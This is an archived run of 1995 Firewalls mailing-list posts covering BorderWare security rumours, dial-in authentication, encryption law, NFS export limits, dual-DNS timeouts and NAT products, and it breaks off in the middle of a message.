Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA18582 for firewalls-outgoing; Mon, 2 Oct 1995 17:05:31 -0700
Received: from motgate.mot.com (motgate.mot.com [129.188.136.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA18565 for ; Mon, 2 Oct 1995 17:05:26 -0700
Received: from pobox.mot.com (pobox.mot.com [129.188.137.100]) by motgate.mot.com (8.6.11/8.6.10/MOT-3.8) with ESMTP id TAA00382 for ; Mon, 2 Oct 1995 19:03:58 -0500
Received: from MACCVM.CORP.MOT.COM (maccvm.corp.mot.com [129.188.244.1]) by pobox.mot.com (8.6.11/8.6.10/MOT-3.8) with SMTP id TAA28564 for ; Mon, 2 Oct 1995 19:03:57 -0500
Received: from MACCVM by MACCVM.CORP.MOT.COM (IBM VM SMTP V2R3) with BSMTP id
 3955; Mon, 02 Oct 95 17:03:56 MST
Date: 02 Oct 1995 17:03:55 -0700
Message-ID: <"XOPR85 95/10/03 00:03:55.546532"@MACCVM.CORP.MOT.COM>
From: Jacob Hinther
To: Firewalls
Subject: Web Browser Test
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Test your web browser!

http://www.c2.org/
http://www.c2.org/hackmsoft/
http://www.c2.org/hacknetscape/

Jake

From firewalls-owner Mon Oct 2 17:30:07 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA19844 for firewalls-outgoing; Mon, 2 Oct 1995 17:25:29 -0700
Received: from bass.com.my (bass.com.my [161.142.248.42]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA19823 for ; Mon, 2 Oct 1995 17:25:20 -0700
Received: from bass.bass.com.my (gw.bass.com.my) by bass.com.my with SMTP id AA05844 (5.67a/IDA-1.5 for ); Tue, 3 Oct 1995 08:24:27 +0800
Received: by bass.bass.com.my (4.1/SMI-4.1) id AA02389; Tue, 3 Oct 95 08:22:02 MYT
Date: Tue, 3 Oct 1995 08:20:43 +0800 (MYT)
From: Tham Huei Hwan
Subject: Re: Public Domain FireWall Software
To: Marcus Antonio - Projeto ISODE
Cc: FireWalls
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

You can obtain fwtk (firewalls tool kit) from ftp.tis.com

On Fri, 29 Sep 1995, Marcus Antonio - Projeto ISODE wrote:

>
> Hello Firewalls
>
> My name's Marcus Antonio, and I'm a Computer Science student at
> Brasil, and I have to implement a network security system. I'd like to know
> how can I get some public domain FireWall software. I work with AIX system.
> Any information would be very important.
>
> Thank you very much...
>
> _______________________________________________________________________________
>
> Marcus Antonio Almeida Rodrigues
>
> UECE
> Universidade Estadual do Ceara'
>
> LAR
> Laboratorio Multiinstitucional de Redes e Sistemas Distribuidos
>
> e-Mail: marcus@fortal.uece.br
> URL: http://www.uece.br/~marcus/
> _______________________________________________________________________________
>

From firewalls-owner Mon Oct 2 19:30:09 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA23692 for firewalls-outgoing; Mon, 2 Oct 1995 19:05:13 -0700
Received: from border.com (janus.border.com [199.71.190.98]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA23685 for ; Mon, 2 Oct 1995 19:05:06 -0700
Received: by janus.border.com id <4998>; Mon, 2 Oct 1995 22:16:48 -0400
To: todd@lgt.com (Todd Glassey)
Subject: Re: Information, We want information
Cc: firewalls@GreatCircle.COM, gated-people@gated.cornell.edu, cypherpunks@toad.com, glenn@border.com
Date: Mon, 2 Oct 1995 22:03:06 -0400
From: Glenn Mackintosh
Message-Id: <95Oct2.221648edt.4998@janus.border.com>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> From: todd@lgt.com (Todd Glassey)
> I have an immediate need of info on the liabilities of BSD type systems, and in
> particular the BorderWare products.
>
> I heard that in the BorderWare product itself, there are several recently
> discovered potential "holes"...
>
> I have a particular interest in both the Attack MO against the BSD
> platforms in general and the Border products in particular...
>
> Please do not send the reply to the lists but to me personally
> (todd@lgt.com).
> I will summarize if I get enough info to be worth the
> effort.
>
> Any comments?

Let me make a very clear statement. No site protected by BorderWare has ever
had its Firewall penetrated. Never.

This is the second time I've heard rumors about insecurities in the BorderWare
software with nothing being brought out to substantiate them. I guess this is
just an unfortunate part of doing business - especially in the security domain.
I get a bit annoyed by this kind of thing since, regardless of whether we refute
such comments, after the discussion itself is forgotten people will often
remember that they heard something about a problem with product X. This isn't a
criticism of you Todd - you are just reporting that you've heard rumors and
asking about them, which is a perfectly reasonable thing to do.

Obviously the rumors you heard haven't come along with any facts since you're
asking here for the "Attack MO". I would very much like to hear about any
problem that is real, since if there were any weaknesses we would want to fix
them and disseminate the fix as fast as possible.

Border takes any potential problem very seriously. A couple of months ago there
was a potential weakness that was discovered in the process of Border's ongoing
efforts to ensure the security of the product. It was only a security risk with
a very specific configuration. No customer has ever reported seeing this. Within
two days of this discovery we had a fix and the fix was being actively pushed
through the distribution channels to the customer base. It was given high
priority and we had our support people calling down to the reseller channels to
ensure that they were aware and that they got it out to their clients. We
intended to make sure that this potential problem was immediately removed from
the firewall even though no one had actually reported a problem. The fix was
given free of charge to anyone whether they had a support contract or not.
Some customers were even upgraded to a newer version of BorderWare so they
could receive the fix. We strongly believe that our customers are entitled to
the best available protection. They bought a Firewall for security and they
should expect it to be secure. Border will do everything that we can to ensure
this is always the case.

So, anyone out there if you believe you have some real attack mechanism we want
to know.

Now that you've sat through the general ranting part of my comments, let me try
to answer the BSD specific part.

As far as BSD based OS's in general I don't think there is reason to believe
that they are any more or less secure than System V based Unixes (or other
non-Unix based operating systems for that matter). They all have pros and cons
and they have all had problems and I don't think that one variant has had more
problems historically than the other.

That said, Border doesn't use a stock BSD based OS anyway. We have put a large
amount of effort into "hardening" the kernel so that it is a solid base upon
which to build a secure firewall. We don't believe that any stock OS which was
designed for a dynamic environment with users on it will really be secure.
There are far too many instances (with just about any OS, Unix or otherwise)
where someone has gained privilege or increased access to a system by taking
advantage of some feature once they managed to get on the box. A firewall
should be a static, non-user environment which means that many features are
just not required and can be removed or their behavior significantly changed
and limited. We spent a considerable amount of manpower stripping down the
kernel and leaving only what was really needed. We removed the mechanisms which
can be used to gain privilege or increase the levels of access to the system.
The BorderWare kernel is in fact one of its strongest assets, and not a
potential weakness.

Glenn Mackintosh
V.P.
Technology
------------------------------------------------------------------------
Border Network Technologies Inc.          Email: glenn@border.com
20 Toronto Street, Suite 400,             Tel:   +1 416 368 7157
Toronto, Ontario, Canada, M5C 2B8         Fax:   +1 416 368 7789

From firewalls-owner Mon Oct 2 21:52:32 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA27528 for firewalls-outgoing; Mon, 2 Oct 1995 21:34:03 -0700
Received: from commsun.its.csiro.au (commsun.its.csiro.au [152.83.8.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id VAA27514 for ; Mon, 2 Oct 1995 21:33:56 -0700
Received: (from fit106@localhost) by commsun.its.csiro.au (8.6.10/8.6.10) id OAA06267; Tue, 3 Oct 1995 14:31:51 +1000
Date: Tue, 3 Oct 1995 14:31:48 +1000 (EST)
From: Kent Fitch
To: firewalls@greatcircle.com
Subject: securing modem access: RADIUS or TACACS+ with PGP authentication
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The organisation I work for is geographically dispersed with Internet
connections in major cities in Australia. We are thinking of establishing
dial-up modem pools in major cities which travelling staff in hotels or locals
at home can use to connect to our WAN and the internet.

Both RADIUS and TACACS+ seem attractive, as I think they would allow us to
establish a central authentication service to vet dial-in access. We are
experimenting with PGP based authentication systems for other purposes, so the
option of using a similar mechanism for dial-in authentication would be
interesting.

From a browse-thru of the RADIUS doco, I can't see how it would accommodate a
challenge-response, such as we might want to use for PGP authentication (we
send out a non-repeating challenge, the user signs it with their PGP private
key, we check the signature).

We currently have a mix of dial-in access boxes - Annex, Cisco and Shiva
(maybe others).
I am interested in the experiences of others using RADIUS or TACACS+,
especially anyone using them with s/key, PGP, or some other software
challenge/response system with different access servers. Vendor responses are
welcome - I'll summarize to the list.

Kent Fitch                      Ph: +61 6 276 6711
ITSB CSIRO Canberra Australia
kent.fitch@its.csiro.au

From firewalls-owner Mon Oct 2 22:52:32 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA29081 for firewalls-outgoing; Mon, 2 Oct 1995 22:45:34 -0700
Received: from hosaka.smallworks.com (hosaka.SmallWorks.COM [192.207.126.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id WAA29074 for ; Mon, 2 Oct 1995 22:45:30 -0700
Received: by hosaka.smallworks.com (5.x/SMI-SVR4) id AA02180; Tue, 3 Oct 1995 00:43:09 -0500
Date: Tue, 3 Oct 1995 00:43:09 -0500
Message-Id: <9510030543.AA02180@hosaka.smallworks.com>
From: Jim Thompson
To: Kent.Fitch@its.csiro.au
Cc: firewalls@GreatCircle.COM, jes@SmallWorks.COM
In-Reply-To: (message from Kent Fitch on Tue, 3 Oct 1995 14:31:48 +1000 (EST))
Subject: Re: securing modem access: RADIUS or TACACS+ with PGP authentication
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Date: Tue, 3 Oct 1995 14:31:48 +1000 (EST)
> From: Kent Fitch
> The organisation I work for is geographically dispersed with Internet
> connections in major cities in Australia. We are thinking of
> establishing dial-up modem pools in major cities which travelling staff
> in hotels or locals at home can use to connect to our WAN and the internet.
>
> Both RADIUS and TACACS+ seem attractive, as I think they would allow us to
> establish a central authentication service to vet dial-in access. We are
> experimenting with PGP based authentication systems for other purposes, so
> the option of using a similar mechanism for dial-in authentication would
> be interesting.
>
> From a browse-thru of the RADIUS doco, I can't see how it would accommodate
> a challenge-response, such as we might want to use for PGP authentication
> (we send out a non-repeating challenge, the user signs it with their PGP
> private key, we check the signature).
>
> We currently have a mix of dial-in access boxes - Annex, Cisco
> and Shiva (maybe others).
>
> I am interested in the experiences of others using RADIUS or TACACS+,
> especially anyone using them with s/key, PGP, or some other software
> challenge/response system with different access servers. Vendor
> responses are welcome - I'll summarize to the list.

I'm one-half, (Jes is the other half), of the team implementing Cisco's
commercial TACACS+ server. (e.g. we're under contract to Cisco.) It wouldn't be
very hard at all to roll PGP into the 'side' of the server. S/Key already
works.

Smallworks also makes and sells 'Netgate', a filtering firewall for SunOS 4.1.X
and Solaris 2.X, in case you've not heard of us before.

If you want to take this off-line and discuss it, we'd be more than happy to do
so.
Cheers,

Jim

From firewalls-owner Mon Oct 2 23:52:40 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA00422 for firewalls-outgoing; Mon, 2 Oct 1995 23:34:13 -0700
Received: from loke.btj.se (loke.btj.se [192.36.60.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA00415 for ; Mon, 2 Oct 1995 23:34:09 -0700
Received: (from goran@localhost) by loke.btj.se (8.6.11/8.6.11) id HAA17208; Tue, 3 Oct 1995 07:32:02 +0100
Date: Tue, 3 Oct 1995 07:32:02 +0100 (NFT)
From: Goran Svensson
To: Bernhard Schneck
cc: gblolmxb@ibmmail.com, firewalls@GreatCircle.COM
Subject: Re: [none]
In-Reply-To: <199510021816.TAA10902@grizzly.genua.de>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 2 Oct 1995, Bernhard Schneck wrote:

> > Frank Willoughby wrote that when sending encrypted mail to a French
> > destination, one must supply the French Gov. with a key. If I, based
> > in London, England, were to send an encrypted (say using PGP with a
> > 1024 bit key) to someone in France, and the French state found out,
> > who would they prosecute? They cant touch me, and all the recipient
> > has to prove is that the message was unsolicited - or am I missing
> > something here?
>
> Yes ... your next visit to the Cote du Rhone ...

Don't forget that the French government does not respect state borders, if you
repeat the 'offense' they might send an amateur hit team to slap you on the
fingers. They have done so in the past, and I suspect that they have not learned
more about international politics since then. For more details about the events,
please contact your nearest Greenpeace representative ......

>
> \Bernhard.
>
> PS: This holds even if you send from London to me in Munich and the
> packets happen to hop through France.
>
> PPS: I understand this is current law, but not actively prosecuted
>
> PPPS: I'm not a lawyer (and will never be one)
>

---------------------------------------------+---------------------------------
Goran Svensson                               ! I can speak for myself, and I do
BTJ System AB                                +---------------------------------
Email: goran@btj.se                          ! This is my opinion. I reserve
Snail: Box 4066, S-227 21 Lund, Sweden       ! the right to change it, doubt it
Phone: +46 46 180 000, Fax: +46 46 180 333   ! or deny it at any time.
---------------------------------------------+---------------------------------
Believe nothing, no matter where you read it, or who said it, no matter if I
have said it, unless it agrees with your own reason and your own common sense.
--Buddha

From firewalls-owner Tue Oct 3 00:00:05 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA00666 for firewalls-outgoing; Mon, 2 Oct 1995 23:55:08 -0700
Received: from quord.agric.nsw.gov.au (quord.agric.NSW.GOV.AU [148.145.15.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id XAA00656 for ; Mon, 2 Oct 1995 23:55:03 -0700
From: neal.sievwright@smtpgwy.agric.nsw.gov.au
Received: from spock.agnet.nis (spock.agric.NSW.GOV.AU) by quord.agric.nsw.gov.au (4.1/SMI-4.1) id AA29676; Tue, 3 Oct 95 16:55:10 EST
Received: from smtpgwy.agric.nsw.gov.au by spock.agnet.nis (5.0/SMI-SVR4) id AA15540; Tue, 3 Oct 1995 16:57:45 --1000
Received: from cc:Mail by smtpgwy.agric.nsw.gov.au id AA812764551; Tue, 03 Oct 95 16:45:26 EST
Date: Tue, 03 Oct 95 16:45:26 EST
Encoding: 1 Text
Message-Id: <9509038127.AA812764551@smtpgwy.agric.nsw.gov.au>
To:
Content-Length: 14
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

signoff

From firewalls-owner Tue Oct 3 00:27:33 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA00808 for firewalls-outgoing; Tue, 3 Oct 1995 00:00:59 -0700
Received: from relay1.pipex.net (relay1.pipex.net [158.43.128.6]) by miles.greatcircle.com
 (8.6.9/Miles-950430-1) with SMTP id AAA00801 for ; Tue, 3 Oct 1995 00:00:54 -0700
Received: from smtpgty.saicuk.co.uk by flow.pipex.net with SMTP (PP); Tue, 3 Oct 1995 07:59:08 +0100
Received: by smtpgty.saicuk.co.uk with Microsoft Mail id <3070E58A@smtpgty.saicuk.co.uk>; Tue, 03 Oct 95 07:26:02 GMT
From: "Johnson-Bryden, Ian"
To: "'firewalls@greatcircle.com'"
Subject: RE: Encryption strength (Was How secure is a WAN...)
Date: Mon, 02 Oct 95 10:37:00 GMT
Message-ID: <3070E58A@smtpgty.saicuk.co.uk>
Encoding: 103 TEXT
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Having taken time out to finish a book for a publishing deadline and not having
had time to follow some discussion groups, I have resubscribed to firewalls and
see most of the topics are the same as earlier in the year. Risk is still
referred to as 'theoretical', but encryption, which some had complained was not
applicable to firewalls, is now under discussion. Sorry if I missed some
important points while unsubscribed.

Risk management is not theoretical, at least no more so than any other human
activity, if it is addressed correctly. There really is not too much benefit in
trying to meet a risk which may not apply. The danger of the firewall is that it
looks like a simple solution to every problem and once you have one it is very
easy to spend more and more time (and money) adding the latest fashion gismo to
it. As many firewall buyers/influencers are sysads it's understandable that
they approach the subject from the relatively narrow perspective of the
information systems department and consider it as a technical issue. That's a
bit like fitting an engine immobiliser to the car when the real risk may be
someone smashing a window to grab valuables left in full view on the back seat.
It may well be that every user who connects to any of the information highways
needs some type of protective barrier, and equally that they may need to
protect their data as it transits the cloud, but that's only part of the risk
addressed and, statistically, it's probably a lower priority against other
risks. Assuming that the firewall is the starting point is much like the
concept of the ancient walled city where the greater risk might have been
plague and fire and the walls sometimes increased those risks. The defensive
wall also didn't provide complete protection from the external attacker because
a strong attacker either broke through the wall or waited for the inhabitants
to starve. In many cases, the money might have been better spent on a fast
chariot the better to head for the hills.

The probability is that most email traffic from most sites has no real value
other than as conversation between two people and may not justify any
encryption costs. Equally, some traffic may be a small percentage of the total
but be highly sensitive. That could mean that a system needs several levels of
encryption strength, but it might mean that some communication simply can't be
carried out electronically. As the vast majority of data users have no method
of segregating data internally and maintaining access only for authorised
users, any user may be able to access any data, anytime, and export it to any
address. Having the ability to strongly encrypt what is transmitted will not
prevent someone sending information deliberately to someone who should not
receive it. It will also not prevent an employee from accessing a recreational
service during company time. There are solutions which can be applied if the
risk factors justify the cost and those solutions will almost certainly require
some form of firewall and some form(s) of encryption and authentication.
A problem which applies to encryption, and other effective risk reduction technology, is the fact that legislators have failed miserably to keep up with technical innovation. The mess over encryption is just one example of government in confusion. As much of the information technology originates in the US, the US Federal Government plays a major role in this confusion. ITAR is only one example. Many of the import and export controls originate in the 'cold war' period and applied to much older technologies but have yet to be replaced by new legislation which addresses today's realities.

From years of experience, I know that obtaining licenses is not really that difficult, but can take a considerable time to complete. There are some end users and applications which won't allow you to obtain a license, but it's not as restrictive as many people claim. Certainly it's much easier to get a G-Dest license on a government to government basis and some governments are more favoured by US Fed than others. US regulations have recently changed and one consequence is the need for any company wanting to import or export 'munitions' to register, which is not necessarily any major problem but is an essential step.

I did notice a posting which suggested that many governments are all set to ban encryption and there have been postings on other discussion groups which make similar claims, particularly citing a document issued by the British Labour Party. I have to say that this doesn't tie in with what I have experienced. Over the years I have spoken with officials and politicians in a number of countries, including the US, on encryption and associated topics. I have also had recent discussions as part of the research for a book specifically on attitudes to data protection and served on some working parties.
The general response I have got is that governments recognise the legitimate requirement to protect information from theft and abuse and accept that this implies a need for encryption to give similar data protection to that provided by well established non-electronic communications systems. What worries them is that criminals can use the same technology to defeat crime prevention efforts. One example frequently cited is the availability of pornography over systems like the Internet. It is also realised that drug dealers and many other categories of criminal are often equipped with better technology than the law enforcement agencies, but then that's nothing new and goes back much further than the Thompson submachine gun.

What most governments are looking for is a way by which they can decrypt data when there is justification to do so, much in the same way that telephones are tapped. Some governments may of course be more cautious about how much they use the facility than others. If these views are combined with military export rules, the result can be that the legitimate user suffers much more than the criminal and the only answer is to lobby your politicians to make sure they understand your needs. Many officials and politicians already understand that high communications availability is essential to business growth and success, and creates wealth. They also understand that this facility must be reliable and secure, so part of the battle is won. What often confuses issues is vested interests trying very hard to push their flavour of technology, rather than presenting a risk and benefits analysis to support their position.
Ian J-B

From firewalls-owner Tue Oct 3 01:22:38 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA02147 for firewalls-outgoing; Tue, 3 Oct 1995 01:02:02 -0700
Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id BAA02139 for ; Tue, 3 Oct 1995 01:01:59 -0700
From: gblolmxb@ibmmail.com
Message-Id: <199510030801.BAA02139@miles.greatcircle.com>
Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R2) with BSMTP id 0023; Tue, 03 Oct 95 03:59:57 EDT
Date: Tue, 03 Oct 1995 04:03:46 EDT
To: firewalls@greatcircle.com
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

All,

Whenever I post to this list, my messages appear without a title - is there any reason for this? Any other SMTP mail gets delivered OK.

Mark.

From firewalls-owner Tue Oct 3 01:30:04 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA02460 for firewalls-outgoing; Tue, 3 Oct 1995 01:13:50 -0700
Received: from clemens.dwf.com (clemens.dwf.com [204.134.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA02447 for ; Tue, 3 Oct 1995 01:13:39 -0700
Received: (from reg@localhost) by clemens.dwf.com (8.6.10/8.6.9) id CAA03698 for firewalls-digest@GreatCircle.com; Tue, 3 Oct 1995 02:11:25 -0600
Date: Tue, 3 Oct 1995 02:11:25 -0600
From: Reg Clemens
Message-Id: <199510030811.CAA03698@clemens.dwf.com>
To: firewalls-digest@GreatCircle.com
Subject: NFS
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am sure that this topic has been beaten to death, so if someone would just point me at the discussion (or tell me that there is no solution) I would be happy to take it from there. I remember reading a paper a couple years ago describing why NFS could never be made secure, but for the life of me I can't seem to find it now.
The problem is SUN's NFS under SUNOS 4.1.3/4. I have a server with a half dozen file systems that are exported read-only to all the other machines in the domain. I would like to restrict their mounting to machines within the domain while maintaining connectivity to the outside world. SUN's software does not support this option, it only allows specifying specific machine names, and the list of *all* machine names overflows some internal limit in SUN's software.

[ The machine uses DNS and not YP, it is rumored that possibly with YP one can get by this limit, but I have no interest in adding YP to my list of problems. ]

So, the Questions

(1) WITHOUT resorting to a firewall, is there any way to accomplish what I want to do?

(2) If not, can it be done with a `simple' packet filter, or does it require a full blown firewall?

Reg.Clemens
clemens@dwf.com

From firewalls-owner Tue Oct 3 01:48:37 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA03024 for firewalls-outgoing; Tue, 3 Oct 1995 01:17:02 -0700
Received: from gatekeeper.frontec.se (gatekeeper.frontec.se [193.13.192.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA03007 for ; Tue, 3 Oct 1995 01:16:55 -0700
Received: from tintin.lule.frontec.se (root@tintin.lule.frontec.se [192.36.15.4]) by gatekeeper.frontec.se (8.6.12/8.6.6) with SMTP id JAA06837 for ; Tue, 3 Oct 1995 09:15:22 +0100
Received: from lobo.lule.frontec.se by tintin.lule.frontec.se with SMTP id AA17006 (5.67a8/IDA-1.5 for ); Tue, 3 Oct 1995 09:15:17 +0100
Date: Tue, 3 Oct 1995 09:15:17 +0100
From: Petter Häggman
Message-Id: <199510030815.AA17006@tintin.lule.frontec.se>
To: Firewalls@GreatCircle.COM
Subject: Re: Dual-DNS Problems
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

cris@dejong.com wrote:

> Back with more dual-DNS problems.
>
> Background: DNS server 1 is internal DNS, can't reach the real
> world directly, but can reach server 2.
> Server 2 is external DNS
> and 'forwarder' for internal DNS server 1.
>
> Situation 1: DNS server 1 'slave' flag in named.boot is *not
> present*. DNS resolves are done quickly and correctly the first
> time, but server 1 keeps generating UDP packets aimed at outside
> servers (which can't reach outside of the secure net).
>

When using a forwarder without the 'slave' directive, the inside DNS will only wait for a 'short' time, before trying to resolve the name/address itself, which it of course can't.. :-}

> Situation 2: DNS server 1 'slave' flag in named.boot *is* present.
> Non-cached DNS resolves requested by internal hosts often
> (usually?) fail on the 1st try, and sometimes on the 2nd, but
> almost always resolve on the 3rd try. No UDP packets from server 1
> are aimed at real-world servers.
>

When using the 'slave' directive, if the outside DNS needs to resolve the name/address (i.e. it's not cached) it takes some time, during which the internal DNS may/will timeout.

> Sounds like a timeout problem, but this doesn't make sense, because
> the timeout should happen in Situation #1 as well. *Why* is this
> happening? Any help... TIA.
>

It happens in the first case as I stated above.

The problem in a nutshell is that the timeout is too short, but who wants to change the source?

My "trick" to fix this is to repeat the forwarder address in the forwarder directive together with the 'slave' directive. Ex.

'forwarder 193.10.10.1 193.10.10.1 193.10.10.1'
'slave'

This means the slave DNS will "ask" three times, and before the third question is done the answer to the first arrives..:-)

(Of course you may repeat the address as many times as you like, but in our network three times works like a charm)

/Petter

> Chris Tyler Chris@DeJong.Com CTyler@Oxford.Net
> Systems Development Manager, Wm. De Jong Enterprises Inc.
> +1-519-424-9007 / fax +1-519-424-2399
> --

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Petter Haggman                     Email: Petter.Haggman@lule.frontec.se
Arctic Software AB                 Phone: +46 920 75116 , Fax: +46 920 75199
Aurorum 1, S-977 75 Lulea, Sweden  NMT: 010 - 259 42 77

From firewalls-owner Tue Oct 3 02:22:46 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA05711 for firewalls-outgoing; Tue, 3 Oct 1995 02:19:45 -0700
Received: from inetsrv1.biss.co.uk (inetsrv1.biss.co.uk [193.115.8.97]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA05688 for ; Tue, 3 Oct 1995 02:19:14 -0700
Received: from ccmailgw.biss.co.uk by inetsrv1.biss.co.uk with SMTP (15.11/15.6) id AA07456; Tue, 3 Oct 95 10:18:27 gmt
Received: from cc:Mail by ccmailgw.biss.co.uk id AA812740420 Tue, 03 Oct 95 10:13:40 EST
Date: Tue, 03 Oct 95 10:13:40 EST
From: Steve_Betts@ccmailgw.biss.co.uk (Steve Betts)
Encoding: 1342 Text
Message-Id: <9509038127.AA812740420@ccmailgw.biss.co.uk>
To: chris@dejong.com, scorp@un.kiev.ua, long-morrow@CS.YALE.EDU
Cc: Firewalls@GreatCircle.COM
Subject: Re[2]: Mail Proxy
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

long-morrow@CS.YALE.EDU wrote:

>1. rot13 a uuencoded file before e-mailing it. Describe in the message
>2. Use an (admittedly) inefficient format for encoding binary, such as:
>3. PGP encrypt the entire message before transmitting. How will the

It occurs to me that even if a human manager checks a uu-encoded attachment, how can they be sure that what they find is what it seems. With the use of a steganographic tool such as Andy Brown's S-Tools.
A user can hide encrypted or binary files inside bitmap or sound files. (and also on a floppy disk, mail is only one media of many to worry about)

I think that the only virus defence that makes any sense is to devolve the responsibility for detection out to the workstation. If every program, DLL etc is scanned before execution it will (should!) catch virii before they infect. This is of course no defence against the transfer of secrets or pornography.

Regards
Steve
--
email: steve.betts@biss.co.uk (pgp key from www page)
www: http://www.biss.co.uk/~steveb/
phone: (+44) 1 442 233 366 (Office GMT)
Never assume my opinions are the same as my employer's.

From firewalls-owner Tue Oct 3 03:00:01 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA06380 for firewalls-outgoing; Tue, 3 Oct 1995 02:57:50 -0700
Received: from rye.city.ac.uk (rye.city.ac.uk [138.40.11.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id CAA06373 for ; Tue, 3 Oct 1995 02:57:45 -0700
Received: from mnt-pleasant.city.ac.uk by rye.city.ac.uk with SMTP (PP) id <12628-0@rye.city.ac.uk>; Tue, 3 Oct 1995 10:55:12 +0100
Received: from euston (sh391@euston.city.ac.uk [138.40.41.1]) by mnt-pleasant.city.ac.uk (8.6.12/8.6.12) with SMTP id KAA28734; Tue, 3 Oct 1995 10:55:08 +0100
Date: Tue, 3 Oct 1995 10:55:04 +0100 (BST)
From: David Brownlee
X-Sender: sh391@euston
To: Reg Clemens
cc: firewalls-digest@GreatCircle.com
Subject: Re: NFS
In-Reply-To: <199510030811.CAA03698@clemens.dwf.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Tue, 3 Oct 1995, Reg Clemens wrote:

> [...]
>
> The problem is SUN's NFS under SUNOS 4.1.3/4. I have a server with a half
> dozen file systems that are exported read-only to all the other machines
> in the domain. I would like to restrict their mounting to machines within
> the domain while maintaining connectivity to the outside world.
> SUN's software does not support this option, it only allows specifying
> specific machine names, and the list of *all* machine names overflows
> some internal limit in SUN's software.
>
> [...]

Replace the innetgr.c in libc.so with a non broken version. (I have a non broken version I can mail on request)

I did that here & happily exported to ~200 machines (with FQDN) from SunOS 4.1.3 & 4.1.4.

More recently I've replaced SunOS with NetBSD which gets it right without any help (And has a _much_ better /etc/exports syntax - I can export to 138.40.X.X easily, and map all uids (not just root) to a given uid & other nice things too).

David/abs
D.K.Brownlee@city.ac.uk (MIME) +44 171 477 8186 {post,host}master (abs)
Network Analyst, UCS, City University, Northampton Square, London EC1V 0HB.
<<< Monochrome - Largest UK Internet BBS - telnet mono.org >>>
>=- Microsoft: Abort and Retry Cancel -or- NetBSD: http://www.netbsd.org -=<

From firewalls-owner Tue Oct 3 03:52:33 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA07100 for firewalls-outgoing; Tue, 3 Oct 1995 03:34:43 -0700
Received: from integd.integralis.co.uk (integd.integralis.co.uk [193.128.143.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA07092 for ; Tue, 3 Oct 1995 03:34:34 -0700
From: dan.collins@integralis.co.uk
Received: from ccgate.integralis.co.uk by INTEGD.INTEGRALIS.CO.UK (PMDF V4.3-10 #8244) id <01HW0350EXS0000CP1@INTEGD.INTEGRALIS.CO.UK>; Tue, 03 Oct 1995 11:34:09 +0000 (GMT)
Date: Tue, 03 Oct 1995 11:28 +0000 (GMT)
Subject: Re: Network Address Translation
To: firewalls@GreatCircle.com
Message-id: <01HW0350J83M000CP1@INTEGD.INTEGRALIS.CO.UK>
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Re: Frank Senters query

>I've heard there are a couple of commercial network address
>translators
>available for those of us who were foolish enough to build extensive
>enterprise networks on non-NIC assigned addresses. Does anyone have
>any
>real-world experience with such a product? Is it possible to kludge
>such
>a product together on a commercial firewall? And lastly, is the
